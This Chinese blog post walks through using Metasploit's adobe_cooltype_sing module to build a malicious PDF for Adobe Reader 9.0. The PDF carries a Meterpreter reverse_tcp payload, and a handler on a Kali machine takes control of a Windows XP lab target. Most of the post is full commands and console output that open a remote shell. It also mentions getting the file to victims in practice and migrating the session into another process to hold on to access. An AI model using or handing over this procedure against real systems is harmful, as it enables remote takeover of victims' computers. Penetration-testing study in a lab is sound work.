版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86633022
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633022
攻击机 Kali 192.168.175.128
靶机 WinXP 192.168.175.130
漏洞程序: Adobe Reader 9.0
1.生成PDF文件
msfconsole
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
show options
exploit
具体如下所示:
msf5 > use exploit/windows/fileformat/adobe_cooltype_sing
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > show options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.175.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (RHOST and RPORT settings will be ignored!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf5 exploit(windows/fileformat/adobe_cooltype_sing) >
可以看到在/root/.msf4/local/目录下生成了msf.pdf。
实际中,我们需要想办法将这个文件传到靶机上。这里为了简单,我直接将文件拷贝到靶机上。
2.上传PDF到靶机
将生成的msf.pdf上传到靶机
3.实施攻击
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
exploit
具体如下:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
4.打开PDF文件
在靶机上利用Adobe Reader 9.0打开PDF文件
5.查看获得的Meterpreter
在攻击机Kali上,我们看到MSF控制台中获得了Meterpreter权限。
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1431) at 2019-01-24 16:05:52 +0800
meterpreter >
最后,最好用migrate命令将当前会话进程绑定到系统的其他进程中。